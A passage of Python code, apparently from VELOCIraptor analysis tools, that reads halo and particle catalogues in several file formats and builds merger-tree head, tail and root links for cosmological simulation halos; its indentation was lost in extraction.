[numhalos,foo]= gfile.readline().split()
numhalos=np.uint64(numhalos)
gfile.close()
#load data
gdata=np.loadtxt(gfilename,skiprows=2,dtype=np.uint64)
numingroup=gdata[:numhalos]
offset=gdata[int(numhalos):int(2*numhalos)]
uoffset=gdata[int(2*numhalos):int(3*numhalos)]
#particle id data
pfile=open(pfilename, 'r')
pfile.readline()
[npart,foo]= pfile.readline().split()
npart=np.uint64(npart)
pfile.close()
piddata=np.loadtxt(pfilename,skiprows=2,dtype=np.int64)
upfile= open(upfilename, 'r')
upfile.readline()
[unpart,foo]= upfile.readline().split()
unpart=np.uint64(unpart)
upfile.close()
upiddata=np.loadtxt(upfilename,skiprows=2,dtype=np.int64)
if (iparttypes==1):
#particle id data
tfile= open(tfilename, 'r')
tfile.readline()
[npart,foo]= tfile.readline().split()
tfile.close()
tdata=np.loadtxt(tfilename,skiprows=2,dtype=np.uint16)
utfile= open(utfilename, 'r')
utfile.readline()
[unpart,foo]= utfile.readline().split()
utfile.close()
utdata=np.loadtxt(utfilename,skiprows=2,dtype=np.uint16)
#binary
elif (ibinary==1):
gfile = open(gfilename, 'rb')
np.fromfile(gfile,dtype=np.int32,count=2)
[numhalos,foo]=np.fromfile(gfile,dtype=np.uint64,count=2)
#need to generalise to
numingroup=np.fromfile(gfile,dtype=binarydtype ,count=numhalos)
offset=np.fromfile(gfile,dtype=binarydtype,count=numhalos)
uoffset=np.fromfile(gfile,dtype=binarydtype,count=numhalos)
gfile.close()
pfile = open(pfilename, 'rb')
np.fromfile(pfile,dtype=np.int32,count=2)
[npart,foo]=np.fromfile(pfile,dtype=np.uint64,count=2)
piddata=np.fromfile(pfile,dtype=binarydtype ,count=npart)
pfile.close()
upfile = open(upfilename, 'rb')
np.fromfile(upfile,dtype=np.int32,count=2)
[unpart,foo]=np.fromfile(upfile,dtype=np.uint64,count=2)
upiddata=np.fromfile(upfile,dtype=binarydtype ,count=unpart)
upfile.close()
if (iparttypes==1):
tfile = open(tfilename, 'rb')
np.fromfile(tfile,dtype=np.int32,count=2)
[npart,foo]=np.fromfile(tfile,dtype=np.uint16,count=2)
tdata=np.fromfile(tfile,dtype=binarydtype ,count=npart)
tfile.close()
utfile = open(utfilename, 'rb')
np.fromfile(utfile,dtype=np.int32,count=2)
[unpart,foo]=np.fromfile(utfile,dtype=np.uint16,count=2)
utdata=np.fromfile(utfile,dtype=binarydtype ,count=unpart)
utfile.close()
#hdf
elif (ibinary==2):
gfile = h5py.File(gfilename, 'r')
numhalos=np.uint64(gfile["Num_of_groups"][0])
numingroup=np.uint64(gfile["Group_Size"])
offset=np.uint64(gfile["Offset"])
uoffset=np.uint64(gfile["Offset_unbound"])
gfile.close()
pfile = h5py.File(pfilename, 'r')
upfile = h5py.File(upfilename, 'r')
piddata=np.int64(pfile["Particle_IDs"])
upiddata=np.int64(upfile["Particle_IDs"])
npart=len(piddata)
unpart=len(upiddata)
pfile.close()
upfile.close()
if (iparttypes==1):
tfile = h5py.File(tfilename, 'r')
utfile = h5py.File(utfilename, 'r')
tdata=np.uint16(pfile["Particle_Types"])
utdata=np.uint16(upfile["Particle_Types"])
tfile.close()
utfile.close()
#now with data loaded, process it to produce data structure
particledata['Npart'][counter:counter+numhalos]=numingroup
unumingroup=np.zeros(numhalos,dtype=np.uint64)
for i in range(int(numhalos-1)):
unumingroup[i]=(uoffset[i+1]-uoffset[i]);
unumingroup[-1]=(unpart-uoffset[-1])
particledata['Npart_unbound'][counter:counter+numhalos]=unumingroup
for i in range(numhalos):
particledata['Particle_IDs'][int(i+counter)]=np.zeros(numingroup[i],dtype=np.int64)
particledata['Particle_IDs'][int(i+counter)][:int(numingroup[i]-unumingroup[i])]=piddata[offset[i]:offset[i]+numingroup[i]-unumingroup[i]]
particledata['Particle_IDs'][int(i+counter)][int(numingroup[i]-unumingroup[i]):numingroup[i]]=upiddata[uoffset[i]:uoffset[i]+unumingroup[i]]
if (iparttypes==1):
particledata['Particle_Types'][int(i+counter)]=np.zeros(numingroup[i],dtype=np.int64)
particledata['Particle_Types'][int(i+counter)][:int(numingroup[i]-unumingroup[i])]=tdata[offset[i]:offset[i]+numingroup[i]-unumingroup[i]]
particledata['Particle_Types'][int(i+counter)][int(numingroup[i]-unumingroup[i]):numingroup[i]]=utdata[uoffset[i]:uoffset[i]+unumingroup[i]]
counter+=numhalos
return particledata
def ReadSOParticleDataFile(basefilename,ibinary=0,iverbose=0,binarydtype=np.int64):
"""
VELOCIraptor/STF catalog_group, catalog_particles and catalog_parttypes in various formats
Note that a file will indicate how many files the total output has been split into
"""
inompi=True
if (iverbose): print("reading particle data",basefilename)
filename=basefilename+".catalog_SOlist"
#check for file existence
if (os.path.isfile(filename)==True):
numfiles=0
else:
filename+=".0"
inompi=False
if (os.path.isfile(filename)==False):
print("file not found",filename)
return []
byteoffset=0
#load header information from file to get total number of groups
#ascii
if (ibinary==0):
gfile = open(filename, 'r')
[filenum,numfiles]=gfile.readline().split()
filenum=int(filenum);numfiles=int(numfiles)
[numSO, numtotSO]= gfile.readline().split()
[numparts, numtotparts]= gfile.readline().split()
numSO=np.uint64(numSO);numtothalos=np.uint64(numtotSO)
numparts=np.uint64(numparts);numtotparts=np.uint64(numtotparts)
#binary
elif (ibinary==1):
gfile = open(filename, 'rb')
[filenum,numfiles]=np.fromfile(gfile,dtype=np.int32,count=2)
[numSO,numtotSO]=np.fromfile(gfile,dtype=np.uint64,count=2)
[numparts,numtotparts]=np.fromfile(gfile,dtype=np.uint64,count=2)
#hdf
elif (ibinary==2):
gfile = h5py.File(filename, 'r')
filenum=int(gfile["File_id"][0])
numfiles=int(gfile["Num_of_files"][0])
numSO=np.uint64(gfile["Num_of_SO_regions"][0])
numtotSO=np.uint64(gfile["Total_num_of_SO_regions"][0])
numparts=np.uint64(gfile["Num_of_particles_in_SO_regions"][0])
numtotparts=np.uint64(gfile["Total_num_of_particles_in_SO_regions"][0])
gfile.close()
particledata=dict()
particledata['Npart']=[]
particledata['Particle_IDs']=[]
if (iverbose):
print("SO lists contains ",numtotSO," regions containing total of ",numtotparts," in ",numfiles," files")
if (numtotSO==0):
return particledata
particledata['Npart']=np.zeros(numtotSO,dtype=np.uint64)
particledata['Particle_IDs']=[[] for i in range(numtotSO)]
#now for all files
counter=np.uint64(0)
for ifile in range(numfiles):
filename=basefilename+".catalog_SOlist"
if (inompi==False):
filename+="."+str(ifile)
#ascii
if (ibinary==0):
gfile = open(filename, 'r')
#read header information
gfile.readline()
[numSO,foo]= gfile.readline().split()
[numparts,foo]= gfile.readline().split()
numSO=np.uint64(numSO)
numparts=np.uint64(numSO)
gfile.close()
#load data
gdata=np.loadtxt(gfilename,skiprows=2,dtype=np.uint64)
numingroup=gdata[:numSO]
offset=gdata[np.int64(numSO):np.int64(2*numSO)]
piddata=gdata[np.int64(2*numSO):np.int64(2*numSO+numparts)]
#binary
elif (ibinary==1):
gfile = open(filename, 'rb')
np.fromfile(gfile,dtype=np.int32,count=2)
[numSO,foo]=np.fromfile(gfile,dtype=np.uint64,count=2)
[numparts,foo]=np.fromfile(gfile,dtype=np.uint64,count=2)
numingroup=np.fromfile(gfile,dtype=binarydtype ,count=numSO)
offset=np.fromfile(gfile,dtype=binarydtype,count=numSO)
piddata=np.fromfile(gfile,dtype=binarydtype ,count=numparts)
gfile.close()
#hdf
elif (ibinary==2):
gfile = h5py.File(filename, 'r')
numSO=np.uint64(gfile["Num_of_SO_regions"][0])
numingroup=np.uint64(gfile["SO_size"])
offset=np.uint64(gfile["Offset"])
piddata=np.int64(gfile["Particle_IDs"])
gfile.close()
#now with data loaded, process it to produce data structure
particledata['Npart'][counter:counter+numSO]=numingroup
for i in range(numSO):
particledata['Particle_IDs'][int(i+counter)]=np.array(piddata[offset[i]:offset[i]+numingroup[i]])
counter+=numSO
return particledata
"""
Routines to build a hierarchy structure (both spatially and temporally)
"""
def BuildHierarchy(halodata,iverbose=0):
"""
the halo data stored in a velociraptor .properties file should store the id of its parent halo. Here
this catalog is used to produce a hierarchy to quickly access the relevant subhaloes of a parent halo.
#todo this should be deprecated as Hierarchy information is typically already contained in halo information
"""
halohierarchy=[]
start=time.clock()
if (iverbose): print("setting hierarchy")
numhalos=len(halodata["npart"])
subhaloindex=np.where(halodata["hostHaloID"]!=-1)
lensub=len(subhaloindex[0])
haloindex=np.where(halodata["hostHaloID"]==-1)
lenhal=len(haloindex[0])
halohierarchy=[[] for k in range(numhalos)]
if (iverbose): print("prelims done ",time.clock()-start)
for k in range(lenhal):
halohierarchy[haloindex[0][k]]=np.where(halodata["hostHaloID"]==halodata["ID"][haloindex[0][k]])
#NOTE: IMPORTANT this is only adding the subsub halos! I need to eventually parse the hierarchy
#data first to deteremine the depth of the subhalo hierarchy and store how deep an object is in the hierarchy
#then I can begin adding (sub)subhalos to parent subhalos from the bottom level up
"""
for k in range(0,len(halodata["npart"])):
hid=np.int32(halodata["hostHaloID"][k])
if (hid>-1 and halohierarchy[k]!=[]):
halohierarchy[hid]=np.append(np.int32(halohierarchy[hid]),halohierarchy[k])
"""
if (iverbose): print("hierarchy set in read in ",time.clock()-start)
return halohierarchy
def TraceMainProgen(istart,ihalo,numsnaps,numhalos,halodata,tree,TEMPORALHALOIDVAL):
"""
Follows a halo along tree to identify main progenitor
"""
#start at this snapshot
k=istart
#see if halo does not have a tail (descendant set).
if (halodata[k]['Tail'][ihalo]==0):
#if halo has not had a tail set the branch needs to be walked along the main branch
haloid=halodata[k]['ID'][ihalo]
#only set the head if it has not been set
#otherwise it should have already been set and just need to store the root head
if (halodata[k]['Head'][ihalo]==0):
halodata[k]['Head'][ihalo]=haloid
halodata[k]['HeadSnap'][ihalo]=k
halodata[k]['RootHead'][ihalo]=haloid
halodata[k]['RootHeadSnap'][ihalo]=k
roothead,rootsnap,rootindex=haloid,k,ihalo
else:
roothead=halodata[k]['RootHead'][ihalo]
rootsnap=halodata[k]['RootHeadSnap'][ihalo]
rootindex=int(roothead%TEMPORALHALOIDVAL)-1
#now move along tree first pass to store head and tails and root heads of main branch
while (True):
#instead of seraching array make use of the value of the id as it should be in id order
#wdata=np.where(tree[k]['haloID']==haloid)
#w2data=np.where(halodata[k]['ID']==haloid)[0][0]
wdata=w2data=int(haloid%TEMPORALHALOIDVAL)-1
halodata[k]['Num_progen'][wdata]=tree[k]['Num_progen'][wdata]
#if no more progenitors, break from search
#if (tree[k]['Num_progen'][wdata[0][0]]==0 or len(wdata[0])==0):
if (tree[k]['Num_progen'][wdata]==0):
#store for current halo its tail and root tail info (also store root tail for root head)
halodata[k]['Tail'][w2data]=haloid
halodata[k]['TailSnap'][w2data]=k
halodata[k]['RootTail'][w2data]=haloid
halodata[k]['RootTailSnap'][w2data]=k
#only set the roots tail if it has not been set before (ie: along the main branch of root halo)
#if it has been set then we are walking along a secondary branch of the root halo's tree
if (halodata[rootsnap]['RootTail'][rootindex]==0):
halodata[rootsnap]['RootTail'][rootindex]=haloid
halodata[rootsnap]['RootTailSnap'][rootindex]=k
break
#store main progenitor
#mainprog=tree[k]['Progen'][wdata[0][0]][0]
mainprog=tree[k]['Progen'][wdata][0]
#calculate stepsize based on the halo ids
stepsize=int(((haloid-haloid%TEMPORALHALOIDVAL)-(mainprog-mainprog%TEMPORALHALOIDVAL))/TEMPORALHALOIDVAL)
#store tail
halodata[k]['Tail'][w2data]=mainprog
halodata[k]['TailSnap'][w2data]=k+stepsize
k+=stepsize
#instead of searching array make use of the value of the id as it should be in id order
#for progid in tree[k-stepsize]['Progen'][wdata[0][0]]:
# wdata3=np.where(halodata[k]['ID']==progid)[0][0]
for progid in tree[k-stepsize]['Progen'][wdata]:
wdata3=int(progid%TEMPORALHALOIDVAL)-1
halodata[k]['Head'][wdata3]=haloid
halodata[k]['HeadSnap'][wdata3]=k-stepsize
halodata[k]['RootHead'][wdata3]=roothead
halodata[k]['RootHeadSnap'][wdata3]=rootsnap
#then store next progenitor
haloid=mainprog
def TraceMainProgenParallelChunk(istart,ihalochunk,numsnaps,numhalos,halodata,tree,TEMPORALHALOIDVAL):
"""
Wrapper to allow for parallelisation
"""
for ihalo in ihalochunk:
TraceMainProgen(istart,ihalo,numsnaps,numhalos,halodata,tree,TEMPORALHALOIDVAL)
def BuildTemporalHeadTail(numsnaps,tree,numhalos,halodata,TEMPORALHALOIDVAL=1000000000000, iverbose=1):
"""
Adds for each halo its Head and Tail and stores Roothead and RootTail to the halo
properties file
TEMPORALHALOIDVAL is used to parse the halo ids and determine the step size between descendant and progenitor
"""
print("Building Temporal catalog with head and tails")
for k in range(numsnaps):
halodata[k]['Head']=np.zeros(numhalos[k],dtype=np.int64)
halodata[k]['Tail']=np.zeros(numhalos[k],dtype=np.int64)
halodata[k]['HeadSnap']=np.zeros(numhalos[k],dtype=np.int32)
halodata[k]['TailSnap']=np.zeros(numhalos[k],dtype=np.int32)
halodata[k]['RootHead']=np.zeros(numhalos[k],dtype=np.int64)
halodata[k]['RootTail']=np.zeros(numhalos[k],dtype=np.int64)
halodata[k]['RootHeadSnap']=np.zeros(numhalos[k],dtype=np.int32)
halodata[k]['RootTailSnap']=np.zeros(numhalos[k],dtype=np.int32)
halodata[k]['Num_progen']=np.zeros(numhalos[k],dtype=np.uint32)
#for each snapshot identify halos that have not had their tail set
#for these halos, the main branch must be walked
#allocate python manager to wrapper the tree and halo catalog so they can be altered in parallel
manager=mp.Manager()
chunksize=5000000 #have each thread handle this many halos at once
#init to that at this point snapshots should be run in parallel
if (numhalos[0]>2*chunksize): iparallel=1
else: iparallel=-1 #no parallel at all
iparallel=-1
totstart=time.clock()
if (iparallel==1):
#need to copy halodata as this will be altered
if (iverbose>0): print("copying halo")
start=time.clock()
mphalodata=manager.list([manager.dict(halodata[k]) for k in range(numsnaps)])
if (iverbose>0): print("done",time.clock()-start)
for istart in range(numsnaps):
if (iverbose>0): print("Starting from halos at ",istart,"with",numhalos[istart])
if (numhalos[istart]==0): continue
#if the number of halos is large then run in parallel
if (numhalos[istart]>2*chunksize and iparallel==1):
#determine maximum number of threads
nthreads=int(min(mp.cpu_count(),ceil(numhalos[istart]/float(chunksize))))
nchunks=int(np.ceil(numhalos[istart]/float(chunksize)/float(nthreads)))
if (iverbose>0): print("Using", nthreads,"threads to parse ",numhalos[istart]," halos in ",nchunks,"chunks, each of size", chunksize)
#now for each chunk run a set of proceses
for j in range(nchunks):
start=time.clock()
offset=j*nthreads*chunksize
#if last chunk then must adjust nthreads
if (j==nchunks-1):
nthreads=int(ceil((numhalos[istart]-offset)/float(chunksize)))
halochunk=[range(offset+k*chunksize,offset+(k+1)*chunksize) for k in range(nthreads)]
#adjust last chunk
if (j==nchunks-1):
halochunk[-1]=range(offset+(nthreads-1)*chunksize,numhalos[istart])
#when calling a process pass not just a work queue but the pointers to where data should be stored
processes=[mp.Process(target=TraceMainProgenParallelChunk,args=(istart,halochunk[k],numsnaps,numhalos,mphalodata,tree,TEMPORALHALOIDVAL)) for k in range(nthreads)]
count=0
for p in processes:
print(count+offset,k,min(halochunk[count]),max(halochunk[count]))
p.start()
count+=1
for p in processes:
#join thread and see if still active
p.join()
if (iverbose>1): print((offset+j*nthreads*chunksize)/float(numhalos[istart])," done in",time.clock()-start)
#otherwise just single
else :
#if first time entering non parallel section copy data back from parallel manager based structure to original data structure
#as parallel structures have been updated
if (iparallel==1):
#tree=[dict(mptree[k]) for k in range(numsnaps)]
halodata=[dict(mphalodata[k]) for k in range(numsnaps)]
#set the iparallel flag to 0 so that all subsequent snapshots (which should have fewer objects) not run in parallel
#this is principly to minimize the amount of copying between manager based parallel structures and the halo/tree catalogs
iparallel=0
start=time.clock()
chunksize=max(int(0.10*numhalos[istart]),10)
for j in range(numhalos[istart]):
#start at this snapshot
#start=time.clock()
TraceMainProgen(istart,j,numsnaps,numhalos,halodata,tree,TEMPORALHALOIDVAL)
if (j%chunksize==0 and j>0):
if (iverbose>1): print("done", j/float(numhalos[istart]), "in", time.clock()-start)
start=time.clock()
if (iverbose>0): print("done with first bit")
#now have walked all the main branches and set the root head, head and tail values
#and can set the root tail of all halos. Start at end of the tree and move in reverse setting the root tail
#of a halo's head so long as that halo's tail is the current halo (main branch)
for istart in range(numsnaps-1,-1,-1):
for j in range(numhalos[istart]):
#if a halo's root tail is itself then start moving up its along to its head (if its head is not itself as well
k=istart
#rootheadid,rootheadsnap=halodata[k]['RootHead'][j],halodata[k]['RootHeadSnap'][j]
roottailid,roottailsnap=halodata[k]['RootTail'][j],halodata[k]['RootTailSnap'][j]
headid,headsnap=halodata[k]['Head'][j],halodata[k]['HeadSnap'][j]
if (roottailid==halodata[k]['ID'][j] and headid!=halodata[k]['ID'][j]):
#headindex=np.where(halodata[headsnap]['ID']==headid)[0][0]
headindex=int(headid%TEMPORALHALOIDVAL)-1
headtailid,headtailsnap=halodata[headsnap]['Tail'][headindex],halodata[headsnap]['TailSnap'][headindex]
haloid=halodata[k]['ID'][j]
#only proceed in setting root tails of a head who's tail is the same as halo (main branch) till we reach a halo who is its own head
while (headtailid==haloid and headid!=haloid):
#set root tails
halodata[headsnap]['RootTail'][headindex]=roottailid
halodata[headsnap]['RootTailSnap'][headindex]=roottailsnap
#move to next head
haloid=halodata[headsnap]['ID'][headindex]
#haloindex=np.where(halodata[headsnap]['ID']==haloid)[0][0]
haloindex=int(haloid%TEMPORALHALOIDVAL)-1
halosnap=headsnap
headid,headsnap=halodata[halosnap]['Head'][haloindex],halodata[halosnap]['HeadSnap'][haloindex]
headindex=int(headid%TEMPORALHALOIDVAL)-1
#store the tail of the next head
headtailid,headtailsnap=halodata[headsnap]['Tail'][headindex],halodata[headsnap]['TailSnap'][headindex]
print("Done building", time.clock()-totstart)
def TraceMainDescendant(istart,ihalo,numsnaps,numhalos,halodata,tree,TEMPORALHALOIDVAL,ireverseorder=False):
"""
Follows a halo along descendant tree to root tails
if reverse order than late times start at 0 and as one moves up in index
one moves backwards in time
"""
#start at this snapshot
halosnap=istart
#see if halo does not have a Head set
if (halodata[halosnap]['Head'][ihalo]==0):
#if halo has not had a Head set the branch needs to be walked along the main branch
haloid=halodata[halosnap]['ID'][ihalo]
#only set the Root Tail if it has not been set. Here if halo has not had
#tail set, then must be the the first progenitor
#otherwise it should have already been set and just need to store the root tail
if (halodata[halosnap]['Tail'][ihalo]==0):
halodata[halosnap]['Tail'][ihalo]=haloid
halodata[halosnap]['TailSnap'][ihalo]=halosnap
halodata[halosnap]['RootTail'][ihalo]=haloid
halodata[halosnap]['RootTailSnap'][ihalo]=halosnap
roottail,rootsnap,rootindex=haloid,halosnap,ihalo
else:
roottail=halodata[halosnap]['RootTail'][ihalo]
rootsnap=halodata[halosnap]['RootTailSnap'][ihalo]
rootindex=int(roottail%TEMPORALHALOIDVAL)-1
#now move along tree first pass to store head and tails and root tails of main branch
while (True):
#ids contain index information
haloindex=int(haloid%TEMPORALHALOIDVAL)-1
halodata[halosnap]['Num_descen'][haloindex]=tree[halosnap]['Num_descen'][haloindex]
#if no more descendants, break from search
if (halodata[halosnap]['Num_descen'][haloindex]==0):
#store for current halo its tail and root tail info (also store root tail for root head)
halodata[halosnap]['Head'][haloindex]=haloid
halodata[halosnap]['HeadSnap'][haloindex]=halosnap
halodata[halosnap]['RootHead'][haloindex]=haloid
halodata[halosnap]['RootHeadSnap'][haloindex]=halosnap
rootheadid,rootheadsnap,rootheadindex=haloid,halosnap,haloindex
#only set the roots head of the root tail
#if it has not been set before (ie: along the main branch of root halo)
if (halodata[rootsnap]['RootHead'][rootindex]==0):
halosnap,haloindex,haloid=rootsnap,rootindex,roottail
#set the root head of the main branch
while(True):
halodata[halosnap]['RootHead'][haloindex]=rootheadid
halodata[halosnap]['RootHeadSnap'][haloindex]=rootheadsnap
descen=halodata[halosnap]['Head'][haloindex]
descenindex=int(descen%TEMPORALHALOIDVAL)-1
descensnap=int(((descen-descen%TEMPORALHALOIDVAL))/TEMPORALHALOIDVAL)
if (ireverseorder):
descensnap=numsnaps-1-descensnap
if (haloid==descen):
break
halosnap,haloindex,haloid=descensnap,descenindex,descen
break
#now store the rank of the of the descandant.
descenrank=tree[halosnap]['Rank'][haloindex][0]
halodata[halosnap]['HeadRank'][haloindex]=descenrank
#as we are only moving along main branches stop if object is rank is not 0
if (descenrank>0):
break
#otherwise, get the descendant
#store main progenitor
maindescen=tree[halosnap]['Descen'][haloindex][0]
maindescenindex=int(maindescen%TEMPORALHALOIDVAL)-1
maindescensnap=int(((maindescen-maindescen%TEMPORALHALOIDVAL))/TEMPORALHALOIDVAL)
#if reverse order, then higher snap values correspond to lower index
if (ireverseorder):
maindescensnap=numsnaps-1-maindescensnap
#calculate stepsize in time based on the halo ids
stepsize=maindescensnap-halosnap
#store descendant
halodata[halosnap]['Head'][haloindex]=maindescen
halodata[halosnap]['HeadSnap'][haloindex]=maindescensnap
#and update the root tails of the object
halodata[maindescensnap]['Tail'][maindescenindex]=haloid
halodata[maindescensnap]['TailSnap'][maindescenindex]=halosnap
halodata[maindescensnap]['RootTail'][maindescenindex]=roottail
halodata[maindescensnap]['RootTailSnap'][maindescenindex]=rootsnap
halodata[maindescensnap]['Num_progen'][maindescenindex]+=1
#then move to the next descendant
haloid=maindescen
halosnap=maindescensnap
def TraceMainDescendantParallelChunk(istart,ihalochunk,numsnaps,numhalos,halodata,tree,TEMPORALHALOIDVAL,ireverseorder):
for ihalo in ihalochunk:
TraceMainDescendant(istart,ihalo,numsnaps,numhalos,halodata,tree,TEMPORALHALOIDVAL,ireverseorder)
def BuildTemporalHeadTailDescendant(numsnaps,tree,numhalos,halodata,TEMPORALHALOIDVAL=1000000000000, ireverseorder=False, iverbose=1):
"""
Adds for each halo its Head and Tail and stores Roothead and RootTail to the halo
properties file
TEMPORALHALOIDVAL is used to parse the halo ids and determine the step size between descendant and progenitor
"""
print("Building Temporal catalog with head and tails using a descendant tree")
for k in range(numsnaps):
halodata[k]['Head']=np.zeros(numhalos[k],dtype=np.int64)
halodata[k]['Tail']=np.zeros(numhalos[k],dtype=np.int64)
halodata[k]['HeadSnap']=np.zeros(numhalos[k],dtype=np.int32)
halodata[k]['TailSnap']=np.zeros(numhalos[k],dtype=np.int32)
halodata[k]['RootHead']=np.zeros(numhalos[k],dtype=np.int64)
halodata[k]['RootTail']=np.zeros(numhalos[k],dtype=np.int64)
halodata[k]['RootHeadSnap']=np.zeros(numhalos[k],dtype=np.int32)
halodata[k]['RootTailSnap']=np.zeros(numhalos[k],dtype=np.int32)
halodata[k]['HeadRank']=np.zeros(numhalos[k],dtype=np.int64)
halodata[k]['Num_descen']=np.zeros(numhalos[k],dtype=np.uint32)
halodata[k]['Num_progen']=np.zeros(numhalos[k],dtype=np.uint32)
#for each snapshot identify halos that have not had their tail set
#for these halos, the main branch must be walked
#allocate python manager to wrapper the tree and halo catalog so they can be altered in parallel
manager=mp.Manager()
chunksize=5000000 #have each thread handle this many halos at once
#init to that at this point snapshots should be run in parallel
if (numhalos[0]>2*chunksize): iparallel=1
else: iparallel=-1 #no parallel at all
iparallel=-1
totstart=time.clock()
if (ireverseorder):
snaplist=range(numsnaps-1,-1,-1)
else:
snaplist=range(numsnaps)
if (iparallel==1):
#need to copy halodata as this will be altered
if (iverbose>0): print("copying halo")
start=time.clock()
mphalodata=manager.list([manager.dict(halodata[k]) for k in range(numsnaps)])
if (iverbose>0): print("done",time.clock()-start)
for istart in snaplist:
if (iverbose>0): print("Starting from halos at ",istart,"with",numhalos[istart])
if (numhalos[istart]==0): continue
#if the number of halos is large then run in parallel
if (numhalos[istart]>2*chunksize and iparallel==1):
#determine maximum number of threads
nthreads=int(min(mp.cpu_count(),ceil(numhalos[istart]/float(chunksize))))
nchunks=int(np.ceil(numhalos[istart]/float(chunksize)/float(nthreads)))
if (iverbose>0): print("Using", nthreads,"threads to parse ",numhalos[istart]," halos in ",nchunks,"chunks, each of size", chunksize)
#now for each chunk run a set of proceses
for j in range(nchunks):
start=time.clock()
offset=j*nthreads*chunksize
#if last chunk then must adjust nthreads
if (j==nchunks-1):
nthreads=int(ceil((numhalos[istart]-offset)/float(chunksize)))
halochunk=[range(offset+k*chunksize,offset+(k+1)*chunksize) for k in range(nthreads)]
#adjust last chunk
if (j==nchunks-1):
halochunk[-1]=range(offset+(nthreads-1)*chunksize,numhalos[istart])
#when calling a process pass not just a work queue but the pointers to where data should be stored
processes=[mp.Process(target=TraceMainDescendantParallelChunk,args=(istart,halochunk[k],numsnaps,numhalos,mphalodata,tree,TEMPORALHALOIDVAL,ireverseorder)) for k in range(nthreads)]
count=0
for p in processes:
print(count+offset,k,min(halochunk[count]),max(halochunk[count]))
p.start()
count+=1
for p in processes:
#join thread and see if still active
p.join()
if (iverbose>1): print((offset+j*nthreads*chunksize)/float(numhalos[istart])," done in",time.clock()-start)
#otherwise just single
else :
#if first time entering non parallel section copy data back from parallel manager based structure to original data structure
#as parallel structures have been updated
if (iparallel==1):
#tree=[dict(mptree[k]) for k in range(numsnaps)]
halodata=[dict(mphalodata[k]) for k in range(numsnaps)]
#set the iparallel flag to 0 so that all subsequent snapshots (which should have fewer objects) not run in parallel
#this is principly to minimize the amount of copying between manager based parallel structures and the halo/tree catalogs
iparallel=0
start=time.clock()
chunksize=max(int(0.10*numhalos[istart]),10)
for j in range(numhalos[istart]):
#start at this snapshot
#start=time.clock()
TraceMainDescendant(istart,j,numsnaps,numhalos,halodata,tree,TEMPORALHALOIDVAL,ireverseorder)
if (j%chunksize==0 and j>0):
if (iverbose>1): print("done", j/float(numhalos[istart]), "in", time.clock()-start)
start=time.clock()
if (iverbose>0): print("done with first bit, setting the main branches walking forward in time")
#now have walked all the main branches and set the root tail, head and tail values
#in case halo data is with late times at beginning need to process items in reverse
if (ireverseorder):
snaplist=range(numsnaps)
else:
snaplist=range(numsnaps-1,-1,-1)
for istart in snaplist:
#identify all haloes which are not primary progenitors of their descendants, having a descendant rank >0
wdata=np.where(halodata[istart]['HeadRank']>0)
#sort this list based on descendant ranking
sortedranking=np.argsort(halodata[istart]['HeadRank'][wdata])
nrankedhalos=len(wdata[0])
rankedhalos=halodata[istart]['ID'][wdata[0][sortedranking]]
#for each of these haloes, set the head and use the root head information and root snap and set all the information
#long its branch
for ihalo in rankedhalos:
haloid=ihalo
haloindex=int(haloid%TEMPORALHALOIDVAL)-1
halosnap=istart
#now set the head of these objects
maindescen=tree[halosnap]['Descen'][haloindex][0]
maindescenindex=int(maindescen%TEMPORALHALOIDVAL)-1
if (ireverseorder):
maindescensnap=numsnaps-1-int((maindescen-maindescen%TEMPORALHALOIDVAL)/TEMPORALHALOIDVAL)
else:
maindescensnap=int((maindescen-maindescen%TEMPORALHALOIDVAL)/TEMPORALHALOIDVAL)
#increase the number of progenitors of this descendant
halodata[halosnap]['Head'][haloindex]=maindescen
halodata[halosnap]['HeadSnap'][haloindex]=maindescensnap
halodata[maindescensnap]['Num_progen'][maindescenindex]+=1
#store the root head
roothead=halodata[maindescensnap]['RootHead'][maindescenindex]
rootsnap=halodata[maindescensnap]['RootHeadSnap'][maindescenindex]
#now set the root head for all the progenitors of this object
while (True):
halodata[halosnap]['RootHead'][haloindex]=roothead
halodata[halosnap]['RootHeadSnap'][haloindex]=rootsnap
if (haloid==halodata[halosnap]['Tail'][haloindex]):
break
haloid=halodata[halosnap]['Tail'][haloindex]
halosnap=halodata[halosnap]['TailSnap'][haloindex]
haloindex=int(haloid%TEMPORALHALOIDVAL)-1
print("Done building", time.clock()-totstart)
def GetProgenLength(halodata,haloindex,halosnap,haloid,atime,TEMPORALHALOIDVAL,endreftime=-1):
"""
Get the length of a halo's progenitors
"""
proglen=1
progid=halodata[halosnap]["Tail"][haloindex]
progsnap=halodata[halosnap]["TailSnap"][haloindex]
progindex=int(progid%TEMPORALHALOIDVAL-1)
while (progid!=haloid):
if (atime[progsnap]<=endreftime):break
proglen+=1
haloid=progid
halosnap=progsnap
haloindex=progindex
progid=halodata[halosnap]["Tail"][haloindex]
progsnap=halodata[halosnap]["TailSnap"][haloindex]
progindex=int(progid%TEMPORALHALOIDVAL-1)
return proglen
def IdentifyMergers(numsnaps,tree,numhalos,halodata,boxsize,hval,atime,MERGERMLIM=0.1,RADINFAC=1.2,RADOUTFAC=1.5,NPARTCUT=100, TEMPORALHALOIDVAL=1000000000000, iverbose=1,pos_tree=[]):
"""
Using head/tail info in halodata dictionary identify mergers based on distance and mass ratios
#todo still testing
"""
for j in range(numsnaps):
#store id and snap and mass of last major merger and while we're at it, store number of major mergers
halodata[j]["LastMerger"]=np.ones(numhalos[j],dtype=np.int64)*-1
halodata[j]["LastMergerRatio"]=np.ones(numhalos[j],dtype=np.float64)*-1
halodata[j]["LastMergerSnap"]=np.zeros(numhalos[j],dtype=np.uint32)
halodata[j]["LastMergerDeltaSnap"]=np.zeros(numhalos[j],dtype=np.uint32)
#halodata[j]["NumMergers"]=np.zeros(numhalos[j],dtype=np.uint32)
#built KD tree to quickly search for near neighbours
if (len(pos_tree)==0):
pos=[[]for j in range(numsnaps)]
pos_tree=[[]for j in range(numsnaps)]
start=time.clock()
if (iverbose): print("tree build")
for j in range(numsnaps):
if (numhalos[j]>0):
boxval=boxsize*atime[j]/hval
pos[j]=np.transpose(np.asarray([halodata[j]["Xc"],halodata[j]["Yc"],halodata[j]["Zc"]]))
pos_tree[j]=spatial.cKDTree(pos[j],boxsize=boxval)
if (iverbose): print("done ",time.clock()-start)
#else assume tree has been passed
for j in range(numsnaps):
if (numhalos[j]==0): continue
#at snapshot look at all haloes that have not had a major merger set
#note that only care about objects with certain number of particles
partcutwdata=np.where(halodata[j]["npart"]>=NPARTCUT)
mergercut=np.where(halodata[j]["LastMergerRatio"][partcutwdata]<0)
hids=np.asarray(halodata[j]["ID"][partcutwdata][mergercut],dtype=np.uint64)
